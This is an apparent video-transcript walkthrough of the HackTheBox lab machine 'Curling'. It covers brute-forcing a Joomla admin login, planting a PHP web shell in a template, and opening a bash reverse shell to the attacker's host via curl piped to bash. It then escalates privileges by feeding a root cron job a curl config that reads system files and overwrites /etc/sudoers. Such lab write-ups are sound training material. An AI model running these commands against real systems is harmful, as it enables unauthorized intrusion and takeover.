What's going on YouTube? This is Ipsec and we're doing curling from HackTheBox, which was a relatively fun and straightforward machine. It starts off with a Joomla webpage that has hints on it at how to get a username and password to log in. You do some magic, get that information, log in, and you notice you're an administrator, and that means you can drop PHP code that when executed you get a reverse shell. With that reverse shell, you try to read user.txt. Notice you can't read it because you need to be the Floris user, but there is a hex dump file called password backup that once you do some magic with that file, you get the password for Floris and you can log in. You get the user.txt and you also notice there's two different files, one input, one report, and you do some changing with input and it modifies what the report file is. And most people stopped with just modifying input to grab root.txt and put it in report. But if you did some digging around on the box, either checking like cron tabs, logs, or just running like pspy, you could see what's going on and then abuse what's going on to drop files in other locations other than report and get a full shell to the box. So let's just jump in and get going. As always, we're going to start off with an nmap using -sc for default scripts, sv enumerate versions, oa output all formats, put in the folder nmap and call this curling, and then the IP address, which is 10.10.10.150. It does take some time to run, so I've already ran it. Looking at the results, we see just two ports are open. We have SSH on port 22 and HTTP on port 80. The server is reporting that it is Ubuntu, and the HTTP server is Apache, and then HTTP scripts report that this is going to be a Joomla instance. So let's go over on the web page and validate that. So going to 10.10.10.150, we see a web page called the Cool Curling Site, and cool is spelt like the tool. So I'm gonna right away just do a cool-h because I don't run this that often. And I want -w to write, so we'll do cool.out on 10.10.10.150. And this is just going to build a word list based upon all the words on this page, and again, I'm doing it just based upon that spelling. And then let us do a view on the source to see if there's any plugins or anything like that visible. Just scrolling down, we can see that the meta name that nmap had picked up right there that says it is Joomla. Scrolling down, we can see that the default template is in use, that is protostar. And then just keep scrolling to see if we see anything like a author tag or some username or really anything about the page at all. And right at the bottom, we see a note that says secret.txt. If we go there, we just get some text. So I'm going to create this file, secret.txt, put that there, and we'll keep that in mind. If we look at cool.out, we have a word list of the page. And the next thing I want to do is probably have some type of Recon going in the background. So I'm going to run JoomScan, which is just a Joomla vulnerability scanner. And we want to do --url HTTP 10.10.10.150, probably -ec to enumerate components. And I don't see an out file, so I'm just going to pipe this to T, and we'll call this joomscan.out. Let that run. And is there anything else we should take a look at? Probably not. So let's take a look at the... probably want to manually enumerate what version of Joomla this is. So I think it's administrator manifest files joomla.xml maybe? Yes, it is. So this file will normally tell you what version of Joomla it is. The first thing we notice is the copyright is 2018, so we know it's been updated recently. And then if we go somewhere, let's see, right here, version 3.8.8. So we know this is a relatively recent version of Joomla. If we just Google like Joomla changelog and put this version in, we should see it is released May 22nd, 2018. And we can search for like Joomla core vulnerabilities. If I could spell correctly. Let's see. It looks like the last core vulnerability was maybe 365, and we're 388. So 345. I don't see anything around 388. You could go to the CVE details and look for a super high CVE Joomla vulnerability, but I know offhand that there hasn't been a major Joomla exploit since this version has been released, so we can ignore that and go back to secret.txt. But before we go back to secret.txt, I guess let's look at this JoomScan, see if it found anything. Firewall detector, not detected. Joomla version, we were correct, 388. Correct about no core vulnerabilities. Directory listing. Admin page. Nothing too interesting yet, and this is still running. So let's go and cat secret.txt, and let's just take a look at this. The first thing I normally do to all files is base64 decode them if they just contain alphanumeric things. And we get curling 2018 exclamation point. Another hint that this is base64 is it is divisible by 4. So if we look at this, we can see 4 sets of 4. If we just echo a single character and then base64 it, we can see it's going to give us an output that is divisible by 4. If we put a bunch of junk, we can probably see this as well. So, as you can see, the equals are definitely for padding to make this string equal to 4. If it was like a URL version of base64, then it may not have padding. Base64 doesn't always have padding, so that can be a bit of a misnomer. But generally, even if it was encrypted, it would be base64, so you can view it in ASCII and not just bytes. So moral of the story is always try to base64 decode things. So with this string, curling 2018, I'm going to guess this is the password. So I'm just going to put this there, and I don't like that file name. I'm going to name it Joomla PW .txt. Go back to this Joomla vulnerability scanner. Don't really see anything. It's just enumerating all the components. So let's take a look and try to brute force our way into the website. So Joomla's default login is at /administrator. Or before we do that, actually, if we go back, there's one thing I want to point out. We see it is written by super user. If it was written by the default admin, it would probably be administrator. And if it was written by a single word thing, it may be an actual user. You could just guess this because this person signed --Floris, but let's do it with cool because that's what the title of this blog is cool. So we'll take the output of that and run it against this. So let's go to Foxy Proxy. Tell us to go through burp. Going into burp, intercept is on. If we click username, let's put fuzz in all caps, and then a password of curling 2018, bang. Click login. And we want to copy this line, and we'll do a WFUZZ-H to get how WFUZZ works. We want -W for word list. This is going to be cool.out. Then we want probably -D for data. I don't think that, oh, that is here, post data. So paste this. And then the URL, which is http://150/administrator/ I think index.php. It is indeed that. So if you didn't know WFUZZ, it's going to go through every line in this word list and replace where fuzz is in all caps with each line. So if we click go, we get a bunch of 303s, which is odd because if we send this to a repeater pressing Control-R, then I'll do Control-Shift-R to switch to that tab, click go, I get a 200 OK. So we kind of have to figure out, I guess, what this variable is, but even so, every time I do this, I'm getting 200 OK. If I change information here, it's still a 200 OK. So let's try modifying this thing. And we get 200 OK denied because it has an invalid security token. Please refresh the page and try again. So maybe that's what this is saying. I don't know why it's giving me a 303 error. Does WFUZZ have a proxy setting? Let's see. grep-i proxy -p. So let's try this. -p http 10.10.10. Oh, not tens. Localhost 127.0.0.1 80.80. We can probably go off the intercept tab, go on to history, and let's see if this sends it. Too many arguments. Maybe this has to be before the URL. -p http 127.0.0.1 80.80. Bad proxy type. Correct values are HTML socks 4 socks 5. HTML? That just looks wrong. Let's see. Let's do WFUZZ-H less proxy -p. Use proxy and format IP:/port:/type. So it probably doesn't want this URI thing. It said HTTP is default, I think. There we go. Now we see all the requests going through burp. We can Control-C this and see what this 303 says. 303 see other. So if we go back to repeater, maybe if we get rid of a cookie, what happens? And we see 303 see other, so, and then asks us to set our cookie. Since we don't have it always saying like invalid token, I'm assuming that this piece is tied to a cookie somehow. So if we click, go back to the page, turn intercept on, resend, go back to burp, go to options, intercept server response all the time. If we click go, this isn't the request I want to intercept. Intercept on. This is the request I want. Click go. We can see the response. It does have a CSRF token. If we highlight this, turn intercept off, turn it back on, try to log in with anything fuzz, and please subscribe. Click login. Probably for this request. We can see what I have in the clipboard. The CSRF token is placed here. But again, because we keep getting invalid logins, or what I'm assuming is invalid login, because we're just getting 200 OK, username and password don't match yet. So yes, I'm assuming this CSRF token is tied to the cookie on every time we load the page, and not something that is a one-time use type of thing. So we just feed a cookie into WFUZZ, and then it should just work. So let's put the password back to curling 2018. Copy this entire string. Go to WFUZZ. We'll delete what's in -d for the post data. Paste it. And again, if we go, we're in intercept mode right now. We get 303s, but if we add a cookie, and I believe that is going to be -c, go back, copy the cookies for WFUZZ, paste, too many arguments, I don't know why that's a thing. Maybe -c is not cookie. So let's do... Oh, -c is probably for color. So WFUZZ-H, cookie is -b. Why is it -b? I have no idea. But -c is for output with colors. So if we want, we can add -c, and we can see colors. So now we have every request. It's giving a 200 and 114 in length, or lines. That's lines, not length. So we can hide with --HL to hide lines. Everything that's 114. Now we just let this run to see if any responses come back. They're not 114 in length. And we got nothing, which is odd. I'm going to grep-I Floris on cool. That should work. Let's try this one more time. Let's try, instead of 114, we'll do HC for hide code, and hide all. I meant 200. So hide all 200 requests. And I forgot to put an exclamation point in the password for curling 2018. So it helps to copy it correctly. So this time we should be good. And if you're wondering where that exclamation point for curling 2018 came from, remember that was secret.txt. If we base64 decode it, we have curling 2018 bang. So before, I had not put the bang right here. And we get a login with Floris. And then the next one also says it's good, but that's probably just because we authenticated a cookie. So any request we make with this cookie, this cookie may be valid. So if we click go on this request, if we use the correct password here, maybe not, I don't know, but the very first request is Floris. So let's try this. We can turn burp off, Floris, and then curling 2018, bang, and we get logged into Joomla. So the very first thing I do whenever I get like an administrative access to pretty much anything, like a CMS, like WordPress, Joomla, etc., is I find a way to edit the templates via the web interface. Because if you can edit the templates normally contain PHP, which if you can modify PHP, you get code execution. So I'm going to go to extension templates, and then we can go to protostar. And then if we just edited like index.php, we could do that. We can also just create a new file. So let's create the file please subscribe.php, and we'll put the contents as php system request and comment, and I just need to end that parenthesis, semicolon. There we go. This should be good. We'll save this file. And then if we go to /pwn.php, oh, not pwned, we called it please subscribe.php. Please subscribe.php. It doesn't exist. But that file actually exists in templates, protostar, please subscribe.php. Because if you remember, if we go to 10.10.10.150, the template is actually in /templates protostar, and if it was if it was I think bees is the other one, if it actually lets me click on index or extensions, templates, bees 3, so this one's probably template /bees 3 if we want to add a file here. So it was please subscribe and comment, and we can do who am I, and we see www data. So we have code execution. So let's just give ourselves a shell. The easiest way to do that is just create a bash reverse shell. So we'll do make dir www, create the file thanks.sh, and then we'll do bash-i dev tcp. I think I'm 10.10.14.13. I am 10.10.14. Oh, 3, not 13. Port 9001, 0, and 1. And again, if you don't know what I just typed there, it's just if you Google pentest monkey reverse shell cheat sheet. It's one of the shells on this site, and I tend to use this one the most. And when this doesn't work, I try doing something like this, and then normally this one works. But let's try this. We just have to host it with python-m, simple HTTP server on port 80. And we can just go back here. And where it says please subscribe.php and comment, we'll do curl 10.10.14.3 / thanks.sh, and then execute that with bash. And I forgot to listen on port 9001. And we have a reverse shell returned to us. So the very first thing I always do is try to upgrade so I can have like the up keys and things like that. So we'll do which Python to see if that's on the box. It is not. We'll do which Python 3. It is. So Python 3-c import pty, pty.spawn, bin bash. And then Control Z to background it, stty raw minus echo. Hit FG enter. You can't see yourself typing, but trust me, it is typing. And then enter one more time, and now we have our up keys and everything like that. So let us go to the /home, go to Floris, and let's try getting user.txt. So if we do a wc-c on user.txt, it probably won't work because we see owner and group. Owner is read write, groups read, and owner and group is Floris, and we are www data. So try this, permission denied, but we do see a file that we can read called password_backup. So if we try to cat that file, we see it is a hex dump. I'm going to export term is equal to xterm. So now we can clear the screen, and we can see the password dump. So I'm going to run a program called xxd-r to reverse it, because if we just created a file before we do that, touch, or we'll do echo please sub to temp, xxd temp, we can see the output is very similar. XXD just gives us a hex dump, which is line number or bytes and hex, then ASCII decoded from this hex. So if we just do xxd Floris password backup -r, I think we need -r first. We get stuff, so we'll send that to 1, then do file against 1. It's a bzip archive, so we can just do bzcat on 1. We get something else, so send this to 2, do file on 2, we get gzip compressed data, so we can do gzcat, I think, or actually just zcat. Yeah, it's just zcat for gzip files on 2, and we get something else. And this file begins with bz, so I'm going to guess this is bzip. But send this to 3, file on 3, bzip2 compressed data, bzcat on 3. We get something else, so send this to 4. We'll do a file against 4. We see it's a POSIX tar archive, So we can just do tar-xf on 4, and then do ls, and we get passwords.txt. If we added a -v to this, xvf, we could see extracted password.txt. If you don't like all these little command line foo things, a really awesome tool is CyberChef by GCIQ. I probably got that wrong. GCHQ. Duh. But let's do the same thing in this tool because this is amazing. So let's cat Floris password dump or password backup. We got all this hexed content. So we can put this over an input and we see output here, and then we got recipes right here. So let's search for hex to see all the operations. We got from hex dump. So put this here, and we can see the output down here. So let's search for a file operation. Let's see, is there a identify file type? I know there is. Detect file type. So we can see the extension is bzip. So bzip decompress. We'll put this between hex dump and detect file type. Now we see it is gzip. So we just do gz. And if we look at gzip, this one says compress data. So this doesn't do anything. We can double click to delete it, but gunzip says it decompresses data. So we'll put that there. Now it says bzip2, so bz decompress, put it underneath gunzip. Then we get tar, do tar. We probably want untar, put that here, and we get unknown file type. So we can just disable this operation for now, and it says one file has been found. If we click password.txt, we get the same exact thing we had before. So CyberChef is a really cool tool for doing a lot of things. Definitely would recommend checking it out. But if we cat password.txt, we get this, and I'm not going to bother base64 decoding it because these are not valid base64 characters. So if we just do SU- on Floris, we can get in, and we can also SSH Floris at 10.10.10, 150, and log in. So now we can do wc-c on user.txt, see it's 33 characters, which is 32 for the MD5 hash, and then a line break. So we could have got that file. There is this AdminArea, and we couldn't get into AdminArea before because, again, it is just read, write, execute for root, and then Floris can read and execute it. So we were www.data before, which meant we couldn't get into this directory. So going in here, we see two files, input and report. If we do ls-la, we can see both files are March 20th, about this 20 seconds ago. So if we cat input, we see it's just HTTP 127.0.0.1. If we cat report, we get the HTML source of the root of the page. So if we go back to our netcat shell, let's just send this to pane 3. And let's test this input file. So if we do input and change the URL to 10.10.14.3, please sub, save this, cat input, we have that there, and we'll wait to see if we get a hit on our simple HTTP server. And there we go. We got a hit. 404 not found because we don't have that file. If we look at the contents of report, we get the error message saying 404 not found. Cewl does have this really cool ability to also do pretty much anything. It does more than just this HTTP. If we specify file : //, we can do like etc passwd and read that. So let's confirm we can do that here. So let's do v input and replace this with file etc passwd. and then we'll do a watch-n1 for every second. We'll do cat report. So every second we are refreshing this report file, and in a few seconds we'll see if it turns into the passwd of the server. There we go. We have a passwd, and we know this is the server because it has Floris. So you can use your imagination at what would happen if you replaced etc passwd with root.txt. What I want to do now is let's try to find a way to get Cewl on the box. So I'm going to do file and then // spool cron tabs spool cron tabs root, and see if we can get roots cron. So save this, do the same thing, and wait to see if this updates with the cron entry for root. And I know this is running on a cron because, well, we just can see the file changes. We know something's happening, so I always check like the schedule task. There we go. And we can see the command is curl-K, home Floris AdminArea input, then output is AdminArea report. So if we control C out of that, we can do man curl, look at the entry for -K, and we see that is config, and we have an example, URL output user agent. So let's actually copy this, -K. So we can just copy this, go into input, and we can paste. And let's do 10.10.14.3 sudoers, and output will be etc sudoers, and the user agent will be thanks for the subscribe. And before we save this, we have to make that sudoers file. So I'm going to copy etc sudoers from my Kali machine to my www directory, and we can edit it. So we want to add the user Floris all, and I forget the no passwd. I think I can just do no passwd there, but we know her password, so we don't have to worry about that. So save this, then Python simple HTTP server. File has been changed since whatever. Oh, we already got the file. So if we do sudo su and password for Floris, cat, what was it? Uh-oh, it's in CyberChef. Copy this, paste, and we are root at curling. So if you didn't want to do it through the cron tab, there's a few other ways we could do this. The first being a different file. If we just went into verilog syslog, verilog, and then had it get the file syslog, we can see curl commands in here. So that would be another place to leak it through just looking at what's going on in the box with that, I guess maybe LFI as root. I don't know what to call that. Another thing we could do is run a program called pspy. So if we do pspy GitHub, and I used to do this with just a simple bash script, but this one's written in Go and much better, so I do use this one nowadays. So let's do cd/opt git clone, and let's see, if we go to release, we can do pspy64 small. I don't know why I git cloned it if I'm just going to grab the release, but wget it, file on it to make sure it's executable. start a simple HTTP server, and let's download this. So curl 10.10.14.3 pspy64s just -o, and we'll just call this pspy. So it's downloaded, chmod +x pspy. And if we execute this, it's going to there's a lot of error messages I'm not used to saying. pspy-h, we can do I guess we'll just run this. And we'll just wait for a new process that launches. This is going to check every few milliseconds, I think, and then just watch processes and output them. And there we go. We see that the cron has started, and we can see exactly the command. And again, that's just watching processes. So if we hit this web server, 10.10.10.150, maybe we'll, instead of doing the reverse shell, we can do who am I? And we see that showing up here. This also has the ability to watch directories. So if we add -d to the arguments, or -f, file system events, we can see every time files get accessed. So if we now do ls/home Floris, we can see stuff. So that is pspy, and that is the video. A little bit short. Hope you guys still enjoyed it. Take care, and I will see you all next week.